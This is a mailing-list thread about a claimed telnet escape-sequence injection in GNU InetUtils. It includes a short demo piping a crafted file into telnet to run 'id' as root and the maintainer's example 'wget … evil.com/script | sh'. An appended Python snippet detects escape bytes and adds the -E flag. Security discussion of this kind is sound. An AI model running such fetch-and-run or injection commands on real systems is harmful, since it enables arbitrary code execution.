Re: [bug-inetutils] telnet security advisory
From: Simon Josefsson
Subject: Re: [bug-inetutils] telnet security advisory
Date: Mon, 03 Oct 2011 20:11:52 +0200
User-agent: Gnus/5.110018 (No Gnus v0.18) Emacs/23.2 (gnu/linux)

sha0 <address@hidden> writes:
> Hi Simon,
>
> I know this is a "feature", but connecting the stdin of telnet with any kind
> of controllable input, will result in command execution, is a dangerous default
> option.
I'm not sure I follow -- connecting the stdin of /bin/sh (as root) with
any kind of input controllable by an attacker is equally dangerous.
What difference do you see between that example and your problem?
Also, doesn't the -E parameter work? It should disable the escape
sequence.
> I have also another vulnerability related with stdin parser, is a SIGSEGV,
> I'm studying if I can control the movl to overwrite a memory function
> pointer in order to get execution,
Can you post a backtrace? The telnet interactive prompt parser is most
likely just buggy.
/Simon
> But also the attack vector is stdin, then the attack vector is "rare"
>
>
> regards.
>
>
> 2011/10/3 Simon Josefsson <address@hidden>
>
>> sha0 <address@hidden> writes:
>>
>> > Hello,
>> >
>> > Is possible to inject an escape sequence via stdin to telnet, and arbitrary
>> > commands will be executed,
>>
>> Hi! Thanks for studying InetUtils for security problems. I'm not sure
>> I follow your "attack" though.
>>
>> > for example:
>> >
>> >
>> > # cat evil-file | telnet 127.0.0.1 80
>> > Trying 127.0.0.1...
>> > Connected to 127.0.0.1.
>> > Escape character is '^]'.
>> >
>> > telnet> !id
>> > uid=0(root) gid=0(root)
>> > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
>> > Connection closed by foreign host.
>> >
>> >
>> > I think is very dangerous despite of few admins use telnet for moving
>> > file like this
>>
>> Yes it is dangerous, so don't do that. Use ftp to transfer files.
>>
>> > 3. DESCRIPTION
>> > -------------------------
>> > When telnet is used to transfer files to remote tcp port, a very
>> > dangerous vulnerability is present, that lets a remote arbitrary code execution.
>>
>> The attack seems to be based on tricking the local root user into doing
>> something stupid. This is similar to asking the local root user to do
>> 'wget -O - http://evil.com/script | sh'. There is no security bug in
>> wget or sh just because that is possible.
>>
>> > 7. SOLUTION
>> > -------------------------
>> > The stdin parser must filter the 0x9d byte.
>>
>> The ^] escape sequence is a documented feature, so I don't think that is
>> a solution.
>>
>> You can use the command line parameter -E to inhibit the escape
>> character if you want. Quoting 'telnet --help':
>>
>> -E, --no-escape use no escape character
>>
>> /Simon
>>
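
An added example, not part of the thread or of InetUtils: a pre-flight check for data that is about to be piped into a telnet client, which reports any escape byte and builds a command line with the `-E` option quoted above. The function names and sample inputs are assumptions made for illustration; 0x1d is the ASCII code that Ctrl-] produces, and 0x9d is the value named in the quoted advisory.

```python
# Added illustration; helper names and sample data are hypothetical.

# 0x1d is ASCII GS, the byte Ctrl-] sends (telnet's default escape character).
# 0x9d is the byte value named in the advisory quoted in this thread.
ESCAPE_BYTES = {0x1D: "^] (0x1d)", 0x9D: "0x9d (advisory)"}


def find_escapes(data: bytes):
    """Return (offset, label, rest_of_line) for every escape byte in data.

    rest_of_line is the text between the escape byte and the next newline,
    i.e. what an interactive client would read at its command prompt.
    """
    hits = []
    for offset, byte in enumerate(data):
        if byte in ESCAPE_BYTES:
            end = data.find(b"\n", offset + 1)
            end = len(data) if end == -1 else end
            tail = data[offset + 1:end].decode("latin-1").rstrip("\r")
            hits.append((offset, ESCAPE_BYTES[byte], tail))
    return hits


def telnet_argv(host: str, port: int, data: bytes):
    """Build the client command line for piping data; refuse risky input."""
    hits = find_escapes(data)
    if hits:
        raise ValueError(
            f"{len(hits)} escape byte(s) in input, first at offset {hits[0][0]}"
        )
    # -E / --no-escape is the option quoted from 'telnet --help' in the thread.
    # It is kept even for clean input, so a later change to the data cannot
    # reach the client's command prompt.
    return ["telnet", "-E", host, str(port)]


if __name__ == "__main__":
    # Constructed sample inputs, not taken from the thread.
    clean = b"HEAD / HTTP/1.0\r\n\r\n"
    tainted = b"HEAD / HTTP/1.0\r\n\x1d!id\n"
    print(telnet_argv("127.0.0.1", 80, clean))
    for offset, label, tail in find_escapes(tainted):
        print(f"offset {offset}: {label} followed by {tail!r}")
```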